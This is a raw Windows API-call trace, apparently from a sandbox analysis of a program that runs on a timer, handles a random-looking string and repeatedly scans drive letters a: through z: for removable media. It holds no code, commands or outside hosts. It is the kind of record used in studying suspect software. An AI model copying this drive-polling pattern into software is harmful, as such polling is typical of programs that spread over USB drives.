lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.059] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.059] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.059] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.059] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.059] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0215.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326020 [0215.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326020 | out: hHeap=0x12c0000) returned 1 [0215.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0215.060] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0215.060] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0215.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.061] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.061] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0215.061] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0215.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.061] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0215.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0215.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.062] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.062] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.062] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.062] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.062] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.063] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.063] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.063] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.063] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.063] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.064] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.064] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.064] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.064] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.064] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.065] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.065] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.065] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.066] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.066] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.066] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.066] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.066] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.067] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.067] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.067] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.067] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0215.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0215.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.068] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0215.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f80 [0215.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f80 | out: hHeap=0x12c0000) returned 1 [0215.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0215.069] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0215.069] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0215.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.070] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0215.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.070] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0215.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.070] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0215.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.070] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0215.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.071] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.071] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.071] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.072] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.072] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.072] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.072] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.072] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.072] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.073] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.073] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.073] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.073] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.073] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.074] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.074] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.074] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.074] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.074] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.075] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.075] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.075] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.075] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.076] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.076] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.076] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.076] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.077] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0215.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325de0 [0215.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325de0 | out: hHeap=0x12c0000) returned 1 [0215.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0215.078] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0215.078] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.078] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.078] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0215.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.079] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0215.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.079] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.079] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0215.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0215.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0215.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0215.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.079] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.079] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.080] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.080] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.080] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.080] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.080] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.080] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.080] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.081] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.081] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.081] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.081] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.081] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.081] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.082] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.082] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.082] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.083] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.083] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.083] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.083] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.084] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.084] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.084] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.084] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.084] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0215.085] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 